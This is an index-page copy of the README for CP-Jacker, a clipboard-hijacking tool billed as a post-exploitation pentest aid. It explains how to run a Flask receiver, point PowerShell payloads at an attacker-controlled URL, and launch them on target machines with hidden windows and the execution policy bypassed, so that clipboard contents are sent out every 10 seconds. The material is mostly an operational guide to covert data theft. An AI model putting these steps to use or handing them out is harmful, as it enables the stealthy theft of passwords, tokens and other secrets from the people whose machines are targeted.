Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/dev-0618/cp-jacker


https://github.com/dev-0618/cp-jacker

Last synced: about 1 year ago
JSON representation

Awesome Lists containing this project

README 

          
# CP-Jacker



Clipboard Hijacker Tool



Overview



This tool is designed for post-exploitation purposes in pentesting scenarios. It monitors and captures clipboard content on Windows and Linux systems, sending the collected data to an attacker-controlled server via HTTP POST requests.



The tool consists of:



win-payload.ps1 for Windows



linux-payload.ps1 for Linux



Both scripts require manual configuration of the server IP address generated by server.py before execution.



---



How It Works



1. Run server.py:

The Python server listens for clipboard data sent from the target systems.



2. Configure IP Address:

Replace the server IP address in the first line of win-payload.ps1 and linux-payload.ps1 with the IP generated by server.py.



3. Execute the Payload:

Run the PowerShell script on the target system to start capturing and sending clipboard data every 10 seconds.



---



Setting Up the Server



1. Install Flask if not already installed:



python3 -m pip install flask



2. Run the server:



python3 server.py



3. The server will display an IP address (e.g., http://10.0.0.5:5000). Use this IP to replace the placeholder in both payload files.



---



Manual IP Configuration



Open the payload file (win-payload.ps1 or linux-payload.ps1) in a text editor.

Update the first line with the correct server IP:



$webhook_url = "http://:5000/clipboard_receiver"



Replace  with the actual IP displayed when running server.py.



---



Execution Commands



Windows Execution



Run the win-payload.ps1 script on the target machine:



powershell -NoP -NonI -W Hidden -Exec Bypass .\win-payload.ps1



---



Linux Execution



Run the linux-payload.ps1 script using PowerShell on Linux:



pwsh -NoProfile -NonInteractive -ExecutionPolicy Bypass -File ./linux-payload.ps1



---